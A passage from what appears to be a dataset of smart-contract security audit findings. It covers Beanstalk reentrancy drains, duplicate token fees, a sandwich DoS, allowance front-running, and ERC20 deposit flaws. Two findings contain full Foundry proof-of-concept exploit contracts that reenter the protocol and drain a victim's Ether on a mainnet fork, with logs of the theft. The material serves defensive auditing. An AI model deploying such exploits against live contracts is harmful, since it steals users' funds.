SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\nчAdd a validation that the tokenA of the last swap in the chain is the same as the tokenA of `multiClaimInput`.чThe function will return an incorrect swap calculation result if the last swap in the chain has a different tokenA than the tokenA of `multiClaimInput` and it can lead to unexpected results.ч```\\nSwapExchange.sol\\n function calculateMultiSwap(SwapUtils.MultiClaimInput calldata multiClaimInput) external view returns (SwapUtils.SwapCalculation memory) {\\n uint256 swapIdCount = multiClaimInput.swapIds.length;\\n if (swapIdCount == 0 || swapIdCount > _maxHops) revert Errors.InvalidMultiClaimSwapCount(_maxHops, swapIdCount);\\n if (swapIdCount == 1) {\\n SwapUtils.Swap memory swap = swaps[multiClaimInput.swapIds[0]];\\n return SwapUtils._calculateSwapNetB(swap, multiClaimInput.amountB, _feeValue, _feeDenominator, _fixedFee);\\n }\\n uint256 matchAmount = multiClaimInput.amountB;\\n address matchToken = multiClaimInput.tokenB;\\n uint256 swapId;\\n bool complete = true;\\n for (uint256 i = 0; i < swapIdCount; i++) {\\n swapId = multiClaimInput.swapIds[i];\\n SwapUtils.Swap memory swap = swaps[swapId];\\n if (swap.tokenB != matchToken) revert Errors.NonMatchingToken();\\n if (swap.amountB < matchAmount) revert Errors.NonMatchingAmount();\\n if (matchAmount < swap.amountB) {\\n if (!swap.isPartial) revert Errors.NotPartialSwap();\\n matchAmount = MathUtils._mulDiv(swap.amountA, matchAmount, swap.amountB);\\n complete = complete && false;\\n }\\n else {\\n matchAmount = swap.amountA;\\n }\\n matchToken = swap.tokenA;\\n }\\n (uint8 feeType,) = _calculateFeeType(multiClaimInput.tokenA, multiClaimInput.tokenB);//@audit-issue no validation matchToken == multiClaimInput.tokenA\\n uint256 fee = FeeUtils._calculateFees(matchAmount, multiClaimInput.amountB, feeType, swapIdCount, _feeValue, _feeDenominator, _fixedFee);\\n SwapUtils.SwapCalculation memory calculation;\\n calculation.amountA = matchAmount;\\n calculation.amountB = multiClaimInput.amountB;\\n calculation.fee = fee;\\n calculation.feeType = feeType;\\n calculation.isTokenBNative = multiClaimInput.tokenB == Constants.NATIVE_ADDRESS;\\n calculation.isComplete = complete;\\n calculation.nativeSendAmount = SwapUtils._calculateNativeSendAmount(calculation.amountB, calculation.fee, calculation.feeType, calculation.isTokenBNative);\\n return calculation;\\n }\\n```\\n -Intermediate value sent by the caller can be drained via reentrancy when `Pipeline` execution is handed off to an untrusted external contractчhighчPipeline is a utility contract created by the Beanstalk Farms team that enables the execution of an arbitrary number of valid actions in a single transaction. The `DepotFacet` is a wrapper around Pipeline for use within the Beanstalk Diamond proxy. When utilizing Pipeline through the `DepotFacet`, Ether value is first loaded by a payable call to the Diamond proxy fallback function, which then delegates execution to the logic of the respective facet function. Once the `DepotFacet::advancedPipe` is called, for example, value is forwarded on to a function of the same name within Pipeline.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n\\nThe important point to note here is that rather than sending the full Ether amount received by the Diamond proxy, the amount sent to Pipeline is equal to that of the `value` argument above, necessitating the use of `LibEth::refundEth`, which itself transfers the entire proxy Ether balance to the caller, following the call to return any unspent Ether.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, \"Eth transfer Failed.\");\\n }\\n}\\n```\\n\\nThis logic appears to be correct and work as intended; however, issues can arise due to the lack of reentrancy guard on `DepotFacet` and `Pipeline` functions. Given the nature of `Pipeline` calls to potentially untrusted external contracts, which themselves may also hand off execution to their own set of untrusted external contracts, this can become an issue if a malicious contract calls back into Beanstalk and/or `Pipeline`.\\n```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes)\\n external\\n payable\\n override\\n returns (bytes[] memory results) {\\n results = new bytes[](pipes.length);\\n for (uint256 i = 0; i < pipes.length; ++i) {\\n results[i] = _advancedPipe(pipes[i], results);\\n }\\n }\\n```\\n\\nContinuing with the example of `DepotFacet::advancedPipe`, say, for example, one of the pipe calls involves an NFT mint/transfer in which some external contract is paid royalties in the form of a low-level call with ETH attached or some safe transfer check hands-off execution in this way, the malicious recipient could initiate a call to the Beanstalk Diamond which once again triggers `DepotFacet::advancedPipe` but this time with an empty `pipes` array. Given the implementation of `Pipeline::advancedPipe` above, this will simply return an empty bytes array and fall straight through to the ETH refund. Since the proxy balance is non-zero, assuming `value != msg.value` in the original call, this `msg.value - value` difference will be transferred to the malicious caller. Once execution returns to the original context and the original caller's transaction is nearing completion, the contract will no longer have any excess ETH, even though it is the original caller who should have received a refund of unspent funds.\\nThis finding also applies to `Pipeline` itself, in which a malicious contract can similarly reenter `Pipeline` and utilize intermediate Ether balance without sending any `value` of their own. For example, given `getEthValue` does not validate the clipboard `value` against the payable `value` (likely due to its current usage within a loop), `Pipeline::advancedPipe` could be called with a single `AdvancedPipeCall` with normal pipe encoding which calls another address owned by the attacker, again forwarding all remaining Ether given they are able to control the `value` parameter. It is, of course, feasible that the original caller attempts to perform some other more complicated pipes following the first, which may revert with 'out of funds' errors, causing the entire advanced pipe call to fail if no tolerant mode behavior is implemented on the target contract, so the exploiter would need to be strategic in these scenarios if they wish to elevate they exploit from denial-of-service to the stealing of funds.чAdd reentrancy guards to both the `DepotFacet` and `Pipeline`. Also, consider validating clipboard Ether values in `Pipeline::_advancedPipe` against the payable function value in `Pipeline::advancedPipe`.чA malicious external contract handed control of execution during the lifetime of a Pipeline call can reenter and steal intermediate user funds. As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of an NFT royalty recipient, for example, to re-enter both Beanstalk and Pipeline, draining funds remaining in the Diamond and Pipeline that should have been refunded to/utilized by the original caller at the end of execution:\\n```\\ncontract DepotFacetPoC is Test {\\n RoyaltyRecipient exploiter;\\n address exploiter1;\\n DummyNFT dummyNFT;\\n address victim;\\n\\n function setUp() public {\\n vm.createSelectFork(\"mainnet\", ATTACK_BLOCK);\\n\\n exploiter = new RoyaltyRecipient();\\n dummyNFT = new DummyNFT(address(exploiter));\\n victim = makeAddr(\"victim\");\\n vm.deal(victim, 10 ether);\\n\\n exploiter1 = makeAddr(\"exploiter1\");\\n console.log(\"exploiter1: \", exploiter1);\\n\\n address _pipeline = address(new Pipeline());\\n vm.etch(PIPELINE, _pipeline.code);\\n\\n vm.label(BEANSTALK, \"Beanstalk Diamond\");\\n vm.label(address(dummyNFT), \"DummyNFT\");\\n vm.label(address(exploiter), \"Exploiter\");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint(\"Victim balance before: \", victim.balance);\\n emit log_named_uint(\"BEANSTALK balance before: \", BEANSTALK.balance);\\n emit log_named_uint(\"PIPELINE balance before: \", PIPELINE.balance);\\n emit log_named_uint(\"DummyNFT balance before: \", address(dummyNFT).balance);\\n emit log_named_uint(\"Exploiter balance before: \", address(exploiter).balance);\\n emit log_named_uint(\"Exploiter1 balance before: \", exploiter1.balance);\\n\\n vm.startPrank(victim);\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(dummyNFT), abi.encodePacked(dummyNFT.mintNFT.selector), abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(1 ether)));\\n IBeanstalk(BEANSTALK).advancedPipe{value: 10 ether}(pipes, 4 ether);\\n vm.stopPrank();\\n\\n emit log_named_uint(\"Victim balance after: \", victim.balance);\\n emit log_named_uint(\"BEANSTALK balance after: \", BEANSTALK.balance);\\n emit log_named_uint(\"PIPELINE balance after: \", PIPELINE.balance);\\n emit log_named_uint(\"DummyNFT balance after: \", address(dummyNFT).balance);\\n emit log_named_uint(\"Exploiter balance after: \", address(exploiter).balance);\\n emit log_named_uint(\"Exploiter1 balance after: \", exploiter1.balance);\\n }\\n}\\n\\ncontract DummyNFT {\\n address immutable i_royaltyRecipient;\\n constructor(address royaltyRecipient) {\\n i_royaltyRecipient = royaltyRecipient;\\n }\\n\\n function mintNFT() external payable returns (bool success) {\\n // imaginary mint/transfer logic\\n console.log(\"minting/transferring NFT\");\\n // console.log(\"msg.value: \", msg.value);\\n\\n // send royalties\\n uint256 value = msg.value / 10;\\n console.log(\"sending royalties\");\\n (success, ) = payable(i_royaltyRecipient).call{value: value}(\"\");\\n }\\n}\\n\\ncontract RoyaltyRecipient {\\n bool exploited;\\n address constant exploiter1 = 0xDE47CfF686C37d501AF50c705a81a48E16606F08;\\n\\n fallback() external payable {\\n console.log(\"entered exploiter fallback\");\\n console.log(\"Beanstalk balance: \", BEANSTALK.balance);\\n console.log(\"Pipeline balance: \", PIPELINE.balance);\\n console.log(\"Exploiter balance: \", address(this).balance);\\n if (!exploited) {\\n exploited = true;\\n console.log(\"exploiting depot facet advanced pipe\");\\n IBeanstalk(BEANSTALK).advancedPipe(new AdvancedPipeCall[](0), 0);\\n console.log(\"exploiting pipeline advanced pipe\");\\n AdvancedPipeCall[] memory pipes = new AdvancedPipeCall[](1);\\n pipes[0] = AdvancedPipeCall(address(exploiter1), \"\", abi.encodePacked(bytes1(0x00), bytes1(0x01), uint256(PIPELINE.balance)));\\n IPipeline(PIPELINE).advancedPipe(pipes);\\n }\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to net 9 additional Ether at the expense of the victim:\\n```\\nRunning 1 test for test/DepotFacetPoC.t.sol:DepotFacetPoC\\n[PASS] test_attack() (gas: 182190)\\nLogs:\\n exploiter1: 0xDE47CfF686C37d501AF50c705a81a48E16606F08\\n Victim balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n PIPELINE balance before: : 0\\n DummyNFT balance before: : 0\\n Exploiter balance before: : 0\\n Exploiter1 balance before: : 0\\n entered pipeline advanced pipe\\n msg.value: 4000000000000000000\\n minting/transferring NFT\\n sending royalties\\n entered exploiter fallback\\n Beanstalk balance: 6000000000000000000\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 100000000000000000\\n exploiting depot facet advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Pipeline balance: 3000000000000000000\\n Exploiter balance: 6100000000000000000\\n exploiting pipeline advanced pipe\\n entered pipeline advanced pipe\\n msg.value: 0\\n Victim balance after: : 0\\n BEANSTALK balance after: : 0\\n PIPELINE balance after: : 0\\n DummyNFT balance after: : 900000000000000000\\n Exploiter balance after: : 6100000000000000000\\n Exploiter1 balance after: : 3000000000000000000\\n```\\n��```\\nfunction advancedPipe(AdvancedPipeCall[] calldata pipes, uint256 value)\\n external\\n payable\\n returns (bytes[] memory results)\\n{\\n results = IPipeline(PIPELINE).advancedPipe{value: value}(pipes);\\n LibEth.refundEth();\\n}\\n```\\n -`FarmFacet` functions are susceptible to the draining of intermediate value sent by the caller via reentrancy when execution is handed off to an untrusted external contractчhighчThe `FarmFacet` enables multiple Beanstalk functions to be called in a single transaction using Farm calls. Any function stored in Beanstalk's EIP-2535 DiamondStorage can be called as a Farm call and, similar to the Pipeline calls originated in the `DepotFacet`, advanced Farm calls can be made within `FarmFacet` utilizing the \"clipboard\" encoding documented in `LibFunction`.\\nBoth `FarmFacet::farm` and `FarmFacet::advancedFarm` make use of the `withEth` modifier defined as follows:\\n```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n\\nUsed in conjunction with `LibEth::refundEth`, within the `DepotFacet`, for example, the call is identified as originating from the `FarmFacet` if `s.isFarm == 2`. This indicates that an ETH refund should occur at the end of top-level `FarmFacet` function call rather than intermediate Farm calls within Beanstalk so that the value can be utilized in subsequent calls.\\n```\\nfunction refundEth()\\n internal\\n{\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n if (address(this).balance > 0 && s.isFarm != 2) {\\n (bool success, ) = msg.sender.call{value: address(this).balance}(\\n new bytes(0)\\n );\\n require(success, \"Eth transfer Failed.\");\\n }\\n}\\n```\\n\\nSimilar to the vulnerabilities in `DepotFacet` and `Pipeline`, `FarmFacet` Farm functions are also susceptible to the draining of intermediate value sent by the caller via reentrancy by an untrusted and malicious external contract. In this case, the attacker could be the recipient of Beanstalk Fertilizer, for example, given this is a likely candidate for an action that may be performed via `FarmFacet` functions, utilizing `TokenSupportFacet::transferERC1155`, and because transfers of these tokens are performed \"safely\" by calling `Fertilizer1155:__doSafeTransferAcceptanceCheck` which in turn calls the `IERC1155ReceiverUpgradeable::onERC1155Received` hook on the Fertilizer recipient.\\nContinuing the above example, a malicious recipient could call back into the `FarmFacet` and re-enter the Farm functions via the `Fertilizer1155` safe transfer acceptance check with empty calldata and only `1 wei` of payable value. This causes the execution of the attacker's transaction to fall straight through to the refund logic, given no loop iterations occur on the empty data and the conditional blocks within the modifier are entered due to the (ever so slightly) non-zero `msg.value`. The call to `LibEth::refundEth` will succeed sinces.isFarm == 1 in the attacker's context, sending the entire Diamond proxy balance. When execution continues in the context of the original caller's Farm call, it will still enter the conditional since their `msg.value` was also non-zero; however, there is no longer any ETH balance to refund, so this call will fall through without sending any value as the conditional block is not entered.чAdd a reentrancy guard to `FarmFacet` Farm functions.\\n\\clearpageчA malicious external contract handed control of execution during the lifetime of a Farm call can reenter and steal intermediate user funds. As such, this finding is determined to be of HIGH severity.\\nProof of Concept: The following forge test demonstrates the ability of a Fertilizer recipient, for example, to re-enter Beanstalk, draining funds remaining in the Diamond that should have been refunded to the original caller at the end of execution:\\n```\\ncontract FertilizerRecipient {\\n bool exploited;\\n\\n function onERC1155Received(address, address, uint256, uint256, bytes calldata) external returns (bytes4) {\\n console.log(\"entered exploiter onERC1155Received\");\\n if (!exploited) {\\n exploited = true;\\n console.log(\"exploiting farm facet farm call\");\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](0);\\n IBeanstalk(BEANSTALK).advancedFarm{value: 1 wei}(data);\\n console.log(\"finished exploiting farm facet farm call\");\\n }\\n return bytes4(0xf23a6e61);\\n }\\n\\n fallback() external payable {\\n console.log(\"entered exploiter fallback\");\\n console.log(\"Beanstalk balance: \", BEANSTALK.balance);\\n console.log(\"Exploiter balance: \", address(this).balance);\\n }\\n}\\n\\ncontract FarmFacetPoC is Test {\\n uint256 constant TOKEN_ID = 3445713;\\n address constant VICTIM = address(0x995D1e4e2807Ef2A8d7614B607A89be096313916);\\n FertilizerRecipient exploiter;\\n\\n function setUp() public {\\n vm.createSelectFork(\"mainnet\", ATTACK_BLOCK);\\n\\n FarmFacet farmFacet = new FarmFacet();\\n vm.etch(FARM_FACET, address(farmFacet).code);\\n\\n Fertilizer fert = new Fertilizer();\\n vm.etch(FERTILIZER, address(fert).code);\\n\\n assertGe(IERC1155(FERTILIZER).balanceOf(VICTIM, TOKEN_ID), 1, \"Victim does not have token\");\\n\\n exploiter = new FertilizerRecipient();\\n vm.deal(address(exploiter), 1 wei);\\n\\n vm.label(VICTIM, \"VICTIM\");\\n vm.deal(VICTIM, 10 ether);\\n\\n vm.label(BEANSTALK, \"Beanstalk Diamond\");\\n vm.label(FERTILIZER, \"Fertilizer\");\\n vm.label(address(exploiter), \"Exploiter\");\\n }\\n\\n function test_attack() public {\\n emit log_named_uint(\"VICTIM balance before: \", VICTIM.balance);\\n emit log_named_uint(\"BEANSTALK balance before: \", BEANSTALK.balance);\\n emit log_named_uint(\"Exploiter balance before: \", address(exploiter).balance);\\n\\n vm.startPrank(VICTIM);\\n // approve Beanstalk to transfer Fertilizer\\n IERC1155(FERTILIZER).setApprovalForAll(BEANSTALK, true);\\n\\n // encode call to `TokenSupportFacet::transferERC1155`\\n bytes4 selector = 0x0a7e880c;\\n assertEq(IBeanstalk(BEANSTALK).facetAddress(selector), address(0x5e15667Bf3EEeE15889F7A2D1BB423490afCb527), \"Incorrect facet address/invalid function\");\\n\\n AdvancedFarmCall[] memory data = new AdvancedFarmCall[](1);\\n data[0] = AdvancedFarmCall(abi.encodeWithSelector(selector, address(FERTILIZER), address(exploiter), TOKEN_ID, 1), abi.encodePacked(bytes1(0x00)));\\n IBeanstalk(BEANSTALK).advancedFarm{value: 10 ether}(data);\\n vm.stopPrank();\\n\\n emit log_named_uint(\"VICTIM balance after: \", VICTIM.balance);\\n emit log_named_uint(\"BEANSTALK balance after: \", BEANSTALK.balance);\\n emit log_named_uint(\"Exploiter balance after: \", address(exploiter).balance);\\n }\\n}\\n```\\n\\nAs can be seen in the output below, the exploiter is able to steal the excess 10 Ether sent by the victim:\\n```\\nRunning 1 test for test/FarmFacetPoC.t.sol:FarmFacetPoC\\n[PASS] test_attack() (gas: 183060)\\nLogs:\\n VICTIM balance before: : 10000000000000000000\\n BEANSTALK balance before: : 0\\n Exploiter balance before: : 1\\n data.length: 1\\n entered __doSafeTransferAcceptanceCheck\\n to is contract, calling hook\\n entered exploiter onERC1155Received\\n exploiting farm facet farm call\\n data.length: 0\\n entered exploiter fallback\\n Beanstalk balance: 0\\n Exploiter balance: 10000000000000000001\\n finished exploiting farm facet farm call\\n VICTIM balance after: : 0\\n BEANSTALK balance after: : 0\\n Exploiter balance after: : 10000000000000000001\\n```\\nч```\\n// signals to Beanstalk functions that they should not refund Eth\\n// at the end of the function because the function is wrapped in a Farm function\\nmodifier withEth() {\\n if (msg.value > 0) s.isFarm = 2;\\n _;\\n if (msg.value > 0) {\\n s.isFarm = 1;\\n LibEth.refundEth();\\n }\\n}\\n```\\n -Duplicate fees will be paid by `LibTransfer::transferFee` when transferring fee-on-transfer tokens with `EXTERNAL_INTERNAL` 'from' mode and `EXTERNAL` 'to' modeчmediumчBeanstalk utilizes an internal virtual balance system that significantly reduces transaction fees when using tokens that are intended to remain within the protocol. `LibTransfer` achieves this by managing every transfer between accounts, considering both the origin 'from' and destination 'to' modes of the in-flight funds. As a result, there are four types of transfers based on the source of the funds (from mode):\\nEXTERNAL: The sender will not use their internal balances for the operation.\\nINTERNAL: The sender will use their internal balances for the operation.\\nEXTERNAL_INTERNAL: The sender will attempt to utilize their internal balance to transfer all desired funds. If funds remain to be sent, their externally owned funds will be utilized to cover the difference.\\nINTERNAL_TOLERANT: The sender will utilize their internal balances for the operation. With insufficient internal balance, the operation will continue (without reverting) with this reduced amount. It is, therefore, imperative to always check the return value of LibTransfer functions to continue the execution of calling functions with the true utilized amount, especially in this internal tolerant case.\\nThe current implementation of `LibTransfer::transferToken` for `(from mode: EXTERNAL ; to mode: EXTERNAL)` ensures a safe transfer operation from the sender to the recipient:\\n```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n\\nPerforming this operation allows duplication of fee-on-transfer token fees to be avoided if funds are first transferred to the contract and then to the recipient; however, `LibTransfer::transferToken` balance will incur double the fee if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` when the internal balance is insufficient cover the full transfer amount, given that:\\nThe remaining token balance would first be transferred to the Beanstalk Diamond, incurring fees.\\nThe remaining token balance would then be transferred to the recipient, incurring fees again.чAdd an internal function `LibTransfer::handleFromExternalInternalToExternalTransfer` to handle this case to avoid duplication of fees. For instance:\\n```\\nfunction handleFromExternalInternalToExternalTransfer(\\n IERC20 token,\\n address sender,\\n address recipient,\\n address amount\\n) internal {\\n uint256 amountFromInternal = LibBalance.decreaseInternalBalance(\\n sender,\\n token,\\n amount,\\n true // allowPartial to avoid revert\\n );\\n uint256 pendingAmount = amount - amountFromInternal;\\n if (pendingAmount != 0) {\\n token.safeTransferFrom(sender, recipient, pendingAmount);\\n }\\n token.safeTransfer(sender, amountFromInternal);\\n}\\n```\\n\\nThen consider the use of this new function in LibTransfer::transferToken:\\n```\\n function transferToken(\\n IERC20 token,\\n address sender,\\n address recipient,\\n uint256 amount,\\n From fromMode,\\n To toMode\\n ) internal returns (uint256 transferredAmount) {\\n// Remove the line below\\n if (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n// Add the line below\\n if (toMode == To.EXTERNAL) {\\n// Add the line below\\n if (fromMode == From.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n// Add the line below\\n } else if (fromMode == From.EXTERNAL_INTERNAL) {\\n// Add the line below\\n handleFromExternalInternalToExternalTransfer(token, sender, recipient, amount);\\n// Add the line below\\n return amount;\\n// Add the line below\\n }\\n }\\n amount = receiveToken(token, amount, sender, fromMode);\\n sendToken(token, amount, recipient, toMode);\\n return amount;\\n }\\n```\\nч`LibTransfer::transferToken` will incur duplicate fees if this function is used for `(from mode: EXTERNAL_INTERNAL ; to mode: EXTERNAL)` with fee-on-transfer tokens if the internal balance is not sufficient to cover the full transfer amount.\\nEven though Beanstalk currently does not impose any fees on token transfers, USDT is associated with the protocol, and its contract has already introduced logic to implement a fee on token transfer mechanism if ever desired in the future. Considering that the duplication of fees implies a loss of funds, but also taking into account the low likelihood of this issue occurring, the severity assigned to this issue is MEDIUM.ч```\\n// LibTransfer::transferToken\\nif (fromMode == From.EXTERNAL && toMode == To.EXTERNAL) {\\n uint256 beforeBalance = token.balanceOf(recipient);\\n token.safeTransferFrom(sender, recipient, amount);\\n return token.balanceOf(recipient).sub(beforeBalance);\\n}\\namount = receiveToken(token, amount, sender, fromMode);\\nsendToken(token, amount, recipient, toMode);\\nreturn amount;\\n```\\n -Flood mechanism is susceptible to DoS attacks by a frontrunner, breaking re-peg mechanism when BEAN is above 1 USDчmediumчA call to the BEAN/3CRV Metapool is made withinWeather::sop, swapping Beans for 3CRV, to aid in returning Beanstalk to peg via a mechanism known as \"Flood\" (formerly Season of Plenty, or sop) when the Beanstalk Farm has been \"Oversaturated\" ($P > 1$; $Pod Rate < 5%$) for more than one Season and for each additional Season in which it continues to be Oversaturated. This is achieved by minting additional Beans and selling them directly on Curve, distributing the proceeds from the sale as 3CRV to Stalkholders.\\nUnlike `Oracle::stepOracle`, which returns the aggregate time-weighted `deltaB` value across both the BEAN/3CRV Metapool and BEAN/ETH Well, the current shortage/excess of Beans during the handling of Rain in `Weather::stepWeather` are calculated directly from the Curve Metapool via `LibBeanMetaCurve::getDeltaB`.\\n```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n\\nThis introduces the possibility that a long-tail MEV bot could perform a denial-of-service attack on the Flood mechanism by performing a sandwich attack on `SeasonFacet::gm` whenever the conditions are met such that `Weather::sop` is called. The attacker would first front-run the transaction by selling BEAN for 3CRV, bringing the price of BEAN back to peg, which could result in `newBeans <= 0`, thus bypassing the subsequent logic, and then back-running to repurchase their sold BEAN effectively maintaining the price of BEAN above peg.\\nThe cost for performing this attack is 0.08% of the utilized funds. However, not accounting for other mechanisms (such as Convert) designed to return the price of Bean to peg, Beanstalk would need to wait the Season duration of 1 hour before making another effective `SeasonFacet::gm`, provided that the previous transaction did not revert. In the subsequent call, the attacker can replicate this action at the same cost, and it is possible that the price of BEAN may have increased further during this hour.чConsider the use of an oracle to determine how many new Beans should be minted and sold for 3CRV. This implies the following modification:\\n```\\n function sop() private {\\n// Remove the line below\\n int256 newBeans = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n int256 currentDeltaB = LibBeanMetaCurve.getDeltaB();\\n// Add the line below\\n (int256 deltaBFromOracle,) = // Remove the line below\\n LibCurveMinting.twaDeltaB();\\n// Add the line below\\n // newBeans = max(currentDeltaB, deltaBFromOracle)\\n// Add the line below\\n newBeans = currentDeltaB > deltaBFromOracle ? currentDeltaB : deltaBFromOracle;\\n\\n if (newBeans <= 0) return;\\n\\n uint256 sopBeans = uint256(newBeans);\\n uint256 newHarvestable;\\n\\n // Pay off remaining Pods if any exist.\\n if (s.f.harvestable < s.r.pods) {\\n newHarvestable = s.r.pods // Remove the line below\\n s.f.harvestable;\\n s.f.harvestable = s.f.harvestable.add(newHarvestable);\\n C.bean().mint(address(this), newHarvestable.add(sopBeans));\\n } else {\\n C.bean().mint(address(this), sopBeans);\\n }\\n\\n // Swap Beans for 3CRV.\\n uint256 amountOut = C.curveMetapool().exchange(0, 1, sopBeans, 0);\\n\\n rewardSop(amountOut);\\n emit SeasonOfPlenty(s.season.current, amountOut, newHarvestable);\\n }\\n```\\n\\nThe motivation for using the maximum value between the current `deltaB` and that calculated from time-weighted average balances is that the action of an attacker increasing `deltaB` to carry out a sandwich attack would be nonsensical as excess Bean minted by the Flood mechanism would be sold for additional 3CRV. In this way, anyone attempting to increase `deltaB` would essentially be giving away their 3CRV LP tokens to Stalkholders. Therefore, by using the maximum `deltaB`, it is ensured that the impact of any attempt to execute the attack described above would be minimal and economically unattractive. If no one attempts the attack, the behavior will remain as originally intended.\\n\\clearpageчAttempts by Beanstalk to restore peg via the Flood mechanism are susceptible to denial-of-service attacks by a sufficiently well-funded sandwich attacker through frontrunning of `SeasonFacet::gm`.ч```\\n function getDeltaB() internal view returns (int256 deltaB) {\\n uint256[2] memory balances = C.curveMetapool().get_balances();\\n uint256 d = getDFroms(balances);\\n deltaB = getDeltaBWithD(balances[0], d);\\n }\\n```\\n -Spender can front-run calls to modify token allowances, resulting in DoS and/or spending more than was intendedчlowчWhen updating the allowance for a spender that is less than the value currently set, a well-known race condition allows the spender to spend more than the caller intended by front-running the transaction that performs this update. Due to the nature of the `ERC20::approve` implementation and other variants used within the Beanstalk system, which update the mapping in storage corresponding to the given allowance, the spender can spend both the existing allowance plus any 'additional' allowance set by the in-flight transaction.\\nFor example, consider the scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending his 100 token allowance.\\nAlice's transaction executes, and Bob's allowance is updated to 50.\\nBob can now spend an additional 50 tokens, resulting in a total of 150 rather than the maximum of 50 as intended by Alice.\\nSpecific functions named `decreaseTokenAllowance`, intended to decrease approvals for a token spender, have been introduced to both the `TokenFacet` and the `ApprovalFacet`. `PodTransfer::decrementAllowancePods` similarly exists for the Pod Marketplace.\\nThe issue, however, with these functions is that they are still susceptible to front-running in the sense that a malicious spender could force their execution to revert, violating the intention of the caller to decrease their allowance as they continue to spend that which is currently set. Rather than simply setting the allowance to zero if the caller passes an amount to subtract that is larger than the current allowance, these functions halt execution and revert. This is due to the following line of shared logic:\\n```\\nrequire(\\n currentAllowance >= subtractedValue,\\n \"Silo: decreased allowance below zero\"\\n);\\n```\\n\\nConsider the following scenario:\\nAlice approves Bob 100 tokens.\\nAlice later decides to decrease this to 50.\\nBob sees this transaction in the mempool and front-runs, spending 60 of his 100 token allowance.\\nAlice's transaction executes, but reverts given Bob's allowance is now 40.\\nBob can now spend the remaining 40 tokens, resulting in a total of 100 rather than the decreased amount of 50 as intended by Alice.\\nOf course, in this scenario, Bob could have just as easily front-run Alice's transaction and spent his entire existing allowance; however, the fact that he is able to perform a denial-of-service attack results in a degraded user experience. Similar to setting maximum approvals, these functions should handle maximum approval revocations to mitigate against this issue.чSet the allowance to zero if the intended subtracted value exceeds the current allowance.\\n\\clearpageчRequiring that the intended subtracted allowance does not exceed the current allowance results in a degraded user experience and, more significantly, their loss of funds due to a different route to the same approval front-running attack vector.ч```\\nrequire(\\n currentAllowance >= subtractedValue,\\n \"Silo: decreased allowance below zero\"\\n);\\n```\\n -Non-standard ERC20 tokens are not supportedчmediumчThe protocol implemented a function `deposit()` to allow users to deposit.\\n```\\nDepositVault.sol\\n function deposit(uint256 amount, address tokenAddress) public payable {\\n require(amount > 0 || msg.value > 0, \"Deposit amount must be greater than 0\");\\n if(msg.value > 0) {\\n require(tokenAddress == address(0), \"Token address must be 0x0 for ETH deposits\");\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), msg.value, tokenAddress));\\n emit DepositMade(msg.sender, depositIndex, msg.value, tokenAddress);\\n } else {\\n require(tokenAddress != address(0), \"Token address must not be 0x0 for token deposits\");\\n IERC20 token = IERC20(tokenAddress);\\n token.safeTransferFrom(msg.sender, address(this), amount);\\n uint256 depositIndex = deposits.length;\\n deposits.push(Deposit(payable(msg.sender), amount, tokenAddress));//@audit-issue fee-on-transfer, rebalancing tokens will cause problems\\n emit DepositMade(msg.sender, depositIndex, amount, tokenAddress);\\n }\\n }\\n```\\n\\nLooking at the line L49, we can see that the protocol assumes `amount` of tokens were transferred. But this does not hold true for some non-standard ERC20 tokens like fee-on-transfer tokens or rebalancing tokens. (Refer to here about the non-standard weird ERC20 tokens)\\nFor example, if token incurs fee on transfer, the actually transferred `amount` will be less than the provided parameter `amount` and the `deposits` will have a wrong state value. Because the current implementation only allows full withdrawal, this means the tokens will be locked in the contract permanently.чWe recommend adding another field in the `Deposit` structure, say `balance`\\nWe recommend allow users to withdraw partially and decrease the `balance` field appropriately for successful withdrawals. If these changes are going to be made, we note that there are other parts that need changes. For example, the withdraw function would need to be updated so that it does not require the withdrawal amount is same to the original deposit amount.чIf non-standard ERC20 tokens are used, the tokens could be locked in the contract permanently.ч```\\nDepositVault.sol\\n function deposit(uint256 